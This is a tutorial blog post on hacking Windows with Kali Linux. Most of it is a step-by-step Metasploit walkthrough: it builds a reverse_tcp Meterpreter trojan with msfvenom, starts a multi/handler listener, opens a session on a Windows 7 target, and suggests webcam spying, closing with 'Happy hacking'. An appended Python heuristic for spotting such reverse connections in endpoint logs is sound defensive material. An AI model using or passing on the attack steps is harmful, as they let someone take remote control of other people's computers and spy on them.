Quick Start Guide: How to Hack Windows with Kali Linux

Kali Linux is derived from Debian Linux and is mainly used for penetration testing. It has over 300 penetration testing programs pre-installed. It ships with the Metasploit Framework from the Metasploit project, a tool for developing and executing exploits. Let’s start by hacking Windows with Kali Linux. It is worth noting that we are writing this post for educational purposes only.
Source machine details:

Kali Linux

root@kali:/# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:/#

Target machine used for hacking:

Windows 7 Ultimate SP1

Step 1: Payload creation

A payload is a program, similar to a virus or a trojan, that runs on a remote machine for the purpose of hacking. The command below creates the payload that will be used to hack Windows with Kali Linux:

	
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root@kali:/# ls -la /root/program.exe
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

We used the ls command to confirm that our payload program was successfully created at the specified location.

Step 2: Run the msfconsole command, which opens the msf prompt.

root@kali:# msfconsole
 
 
 
 
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
 
       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
msf >

Step 3: For the exploit, we used the following details:

  • Port 4444: you can use any port of your choice
  • LHOST IP: 192.168.189.128, the IP of the Kali Linux machine. You can find the IP your machine is using with the following command on Kali:
root@kali:/# ip r l
192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100
root@kali:/#

Now run the command “use exploit/multi/handler” at the msf prompt:

msf > use exploit/multi/handler
msf exploit(handler) >

Then run the command “set payload windows/meterpreter/reverse_tcp” at the next prompt:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

Now set your local IP and port using the lhost and lport commands as shown below:

msf exploit(handler) > set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit(handler) > set lport 4444
lport => 4444

Finally, run the exploit command:

msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...

Now you need to execute “program.exe” on the Windows machine. Once it is executed on the target machine, a meterpreter session is set up. Just type sysinfo to get the details of the compromised Windows machine.

msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
 
meterpreter > sysinfo
Computer        : MANN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_IN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

After you have successfully obtained the details, you can do more or get more information with the “help” command, which shows all the options with which you can hack the system. For example, you can run the webcam snap command “webcam_snap”, and you can use many of the other available options in the same way. Happy hacking!!!!
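On the defending side, the session in this walkthrough appears in endpoint network logging as an outbound connection to 192.168.189.128:4444, started by an executable the user ran. The example below is added here and is not from the original post: it scores constructed records modeled on Sysmon Event ID 3 fields (Image, Initiated, DestinationIp, DestinationPort). The file paths, the pipe-delimited format and the trusted-path list are assumptions.

```python
import ntpath

# Install locations treated as trusted for this heuristic (assumption).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# 4444 is the LPORT from the walkthrough. The port is attacker-chosen, so it
# only adds to the score and is never the sole condition.
WATCHED_PORTS = {4444}

# Constructed sample records (not real logs), pipe-delimited key=value pairs.
SAMPLE_EVENTS = [
    r"Image=C:\Program Files\Browser\browser.exe|Initiated=true|DestinationIp=203.0.113.10|DestinationPort=443",
    r"Image=C:\Users\user\Downloads\program.exe|Initiated=true|DestinationIp=192.168.189.128|DestinationPort=4444",
    r"Image=C:\Windows\System32\svchost.exe|Initiated=false|DestinationIp=192.168.189.1|DestinationPort=4444",
    r"Image=C:\Users\user\AppData\Local\Temp\setup.exe|Initiated=true|DestinationIp=203.0.113.20|DestinationPort=443",
]

def parse_event(line):
    """Split one 'key=value|key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))

def score_event(ev):
    """Return (score, reasons) for one connection record."""
    reasons = []
    if ev.get("Initiated", "").lower() != "true":
        return 0, reasons  # inbound connection: not the reverse-connect pattern
    if not ev["Image"].lower().startswith(TRUSTED_PREFIXES):
        reasons.append("image outside trusted install paths")
    if int(ev["DestinationPort"]) in WATCHED_PORTS:
        reasons.append("destination port on watch list")
    return len(reasons), reasons

def triage(events, threshold=1):
    """Return (exe, dest_ip, score, reasons) tuples, highest score first."""
    hits = []
    for line in events:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ntpath.basename(ev["Image"]), ev["DestinationIp"], score, reasons))
    return sorted(hits, key=lambda h: -h[2])

if __name__ == "__main__":
    for exe, dest, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{score} {exe} -> {dest}: {', '.join(reasons)}")
```

Because the handler port is configurable, the path condition carries the detection: an executable outside the install directories that initiates outbound traffic is reported even on port 443.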
